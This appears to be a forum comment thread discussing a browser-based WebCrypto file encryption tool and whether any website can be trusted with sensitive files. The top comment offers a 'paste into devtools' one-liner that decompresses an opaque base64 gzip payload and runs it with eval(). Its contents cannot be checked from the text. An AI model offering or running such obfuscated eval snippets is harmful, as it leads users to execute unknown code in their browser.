Browser-based file encryption tool using WebCrypto

6 comments

• kig 16 minutes ago
  For fun, here's a copy-paste-into-devtools version: (async()=>{const r=await fetch(`data:text/plain;base64,H4sIAAAAAAAAE61UYW/TMBD9K5m1D7a4mbWwCiUKaGMFpA4xbQw+TNPkOZfGzLUj+7IQTfnvKGlXjQESSHzznd+9d753soqd00nZOE3Gu6Tm4t4iJZgXXjcrdCR1QEU4tzhEnBlXN8REhpK6GnNWGosMUHqnK+WWmKuREfPXIxHlKEmFJZIckPFy/yozJd8hEZCa4LIBpHLVKkMJSRWC6o6assTABbjcYZtcGEevDocLrgSYvA5+VRNnc0cYklrF2PpQpEyMxOYxsc5b4wrfSh26mryMzQ1ZhDDyfsbvNHfaF4OWxPHEjQC76UZLs6p9oAV2nAXVMgjATo8Wx++mDHYmcMkKDOYOF9ixKwExo9CNb/a5k9EajXwfJjMB3TaezODFVEC7TQxRvdXb8vF7p1aYbtWispR6MIRBDT7FdIIHUKlYpez8w+He9GDGerCwKTucn++9f/uRgUW3pCqdHsz6h47HSQz9Fo9kxyR/Wm3u0q6HGlqRxadOFAK0d9FblNYvOXtnLCax0RpjLBtru2TDisUOE71WpCu+Evc/FR2vIcPilcpYLGRyGrxGLIxbJq2hKkH3AJFSMjG6uptv7FwinSlX+NUXZRuM/EmPk5kQUP0LuPxLK3b/gxWblw1WLLeym+TvrKh6KMEJaJ5asRQZ/8WfF9NnjbzpCE9GXSFkROK7sC8gjsdqXM31uRm2sh9Ge51d5yQHcYmuiF8NVZwNXTHxZpN/2Oy9lyJdp56tEaM387GRI+tv+GW8gvvhk0iZqmtr9Div514T0l6kgGrFegGLP341iolsIauAZX5xdrK5/XTzDTVdnJ3wuYCFLHzrrFdFfg0Lqa3Rt1zAgA54528foddEogd8gPVZzcUPElYnqAAFAAA=`),d=r.body.pipeThrough(new DecompressionStream('gzip')),t=await new Response(d).text();eval(t);})();
• Gigachad 1 hour ago
  Looks nice, but I just can’t imagine the use case where you care about security enough to encrypt a file, but not enough that you trust a random website with it.
  [-]
  • radical_halogen 1 hour ago
    Here's the other one I know of that has some degree of trust (non browser based also available)

    https://pteo.paranoiaworks.mobi/en/

    It says it is client side you could also download the page with what and open the html file for added assurance
  • unixlor 1 hour ago
    I see the point, keep in mind encryption etc all runs client side. would obviously never recommend to encrypt anything sensetive or critical on a website :D
    [-]
    • Gigachad 1 hour ago
      While that's all well and good. The problem is a website can update it's code every time you load it. So while the user can audit nothing is being sent, they would have to do this every time they load it.

      While I think the UI is super nice here. I'd personally stick to a trusted tool from an org and project with a good reputation and long history.

      [-]
      • pizzly 38 minutes ago
        Could we automate the auditing of the website every time it runs?
        [-]
        • unixlor 21 minutes ago
          working on ideas to do this, currently i have this but not good enough yet https://secvant.com/changelog
      • unixlor 1 hour ago
        agreed, i'll see if there's a good way for me to prove when and what changed maybe be uploading to github and keeping it open source
  • unixlor 1 hour ago
    [flagged]
• bear330 56 minutes ago
  maybe encrypt in localhost then send to another securely is another option? https://github.com/nuwainfo/ffl also decrypt using webcryto
• Retr0id 37 minutes ago
  Is the source code available for review?
  [-]
  • unixlor 28 minutes ago
    will be very soon, just completing all the features on the site first :)
• unixlor 1 hour ago
  [flagged]